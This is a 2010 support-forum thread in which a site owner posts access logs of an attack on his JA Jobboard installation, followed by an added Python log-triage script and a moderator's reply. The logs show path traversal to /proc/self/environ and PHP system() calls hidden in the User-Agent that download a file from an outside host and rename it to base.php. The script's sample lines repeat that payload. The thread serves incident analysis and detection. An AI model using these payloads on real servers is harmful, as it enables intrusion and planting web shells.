kutu Friend
May 24, 2010 at 1:10 pm #151286
I recently noticed unusual files in my root folder. Their names are base.txt and n.txt.
After I asked my hosting company, I received these log files:
74.7.241.42 – – [13/Apr/2010:22:34:32 +0300] “GET /index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1343 “-” “jcfs<?system(“lwp-download http://lnsshop.co .kr/n.txt 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:35:33 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1419 “-” “jcfs<?system(“id 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:36:59 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1368 “-” “jcfs<?system(“ls n.txt 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:36:38 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1763 “-” “jcfs<?system(“wget http://lnsshop.co.kr/n.txt 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:36:43 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1767 “-” “jcfs<?system(“wget http://lnsshop.co.kr/n.txt 2> /dev/stdout”); ?>jcfs”
So someone uploaded a shell file to my root folder via jobboard, then renamed the n.txt file using JA Jobboard? (as you see below)
74.7.241.42 – – [13/Apr/2010:22:37:18 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1362 “-” “jcfs<?system(“mv n.txt base.php 2> /dev/stdout”); ?>jcfs”
This is an enterprise paid component, so how could it have this kind of BUG?
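Added example, not part of the thread and not JA Jobboard code: a triage script for access-log lines like the ones posted above, flagging the traversal include of /proc/self/environ and recovering the commands carried in the User-Agent. The sample lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "\S+ (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>.*?)" "(?P<agent>.*)"$')
TRAVERSAL_RE = re.compile(r'(?:\.\./){2,}')
# Shell-executing PHP calls; Apache logs an embedded quote as \" so accept both forms.
SHELL_CALL_RE = re.compile(
    r'\b(?:system|exec|passthru|shell_exec|popen)\s*\(\s*\\?"(?P<cmd>.*?)\\?"\s*\)')

# Constructed sample lines (documentation IP ranges), modelled on the thread's log.
# The first uses Apache's \" escaping, the second the unescaped form shown in the post.
SAMPLE_LOG = r'''203.0.113.5 - - [13/Apr/2010:22:35:33 +0300] "GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../proc/self/environ%00 HTTP/1.1" 200 1419 "-" "jcfs<?system(\"id 2> /dev/stdout\"); ?>jcfs"
203.0.113.5 - - [13/Apr/2010:22:37:18 +0300] "GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../proc/self/environ%00 HTTP/1.1" 200 1362 "-" "jcfs<?system("mv n.txt base.php 2> /dev/stdout"); ?>jcfs"
198.51.100.7 - - [13/Apr/2010:22:40:01 +0300] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

def analyse(line):
    """Return a finding dict for a suspicious log line, or None for a clean one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    uri = unquote(m['uri'])          # decode %00 and percent-encoded dots/slashes
    agent = m['agent']
    findings = []
    if TRAVERSAL_RE.search(uri):
        findings.append('path-traversal')
    if '/proc/self/environ' in uri:
        findings.append('proc-environ-include')
    if '\x00' in uri:
        findings.append('null-byte')
    if '<?' in agent:
        findings.append('php-in-user-agent')
    if not findings:
        return None
    # Recovered commands name the files to look for on disk (here: n.txt, base.php).
    return {'ip': m['ip'], 'time': m['time'], 'status': int(m['status']),
            'findings': findings,
            'commands': [c['cmd'] for c in SHELL_CALL_RE.finditer(agent)]}

def scan(log_text):
    return [hit for hit in map(analyse, log_text.splitlines()) if hit]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['time'], hit['ip'], hit['status'], hit['findings'], hit['commands'])
```

A flagged line with status 200 and a recovered command is the one to follow up first: the file names in the command are what to search for in the web root.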
Arvind Chauhan Moderator
kutu Friend
May 24, 2010 at 7:32 pm #344567
Do you want the logs for the whole day on which the txt file was uploaded? I only got these logs, which are related to the txt file, from the hosting company.
Would you describe exactly which log records?
Anonymous Moderator JA Developer
May 25, 2010 at 9:02 am #344648
@kutu 179797 wrote:
> Do you want the logs for the whole day on which the txt file was uploaded? I only got these logs, which are related to the txt file, from the hosting company.
> Would you describe exactly which log records?
Hi Kutu,
I would like to clarify that all the links in your log file are trying to steal accounts stored on the server. Thus, your server should be configured to prevent such an attack from outside.
I already checked all the links and could see that JAJobboard has no error that creates a gap helping a hacker do this while the component is running.
Kindly check and get back to us for any information.
This topic contains 4 replies, has 3 voices, and was last updated by Anonymous 14 years, 7 months ago.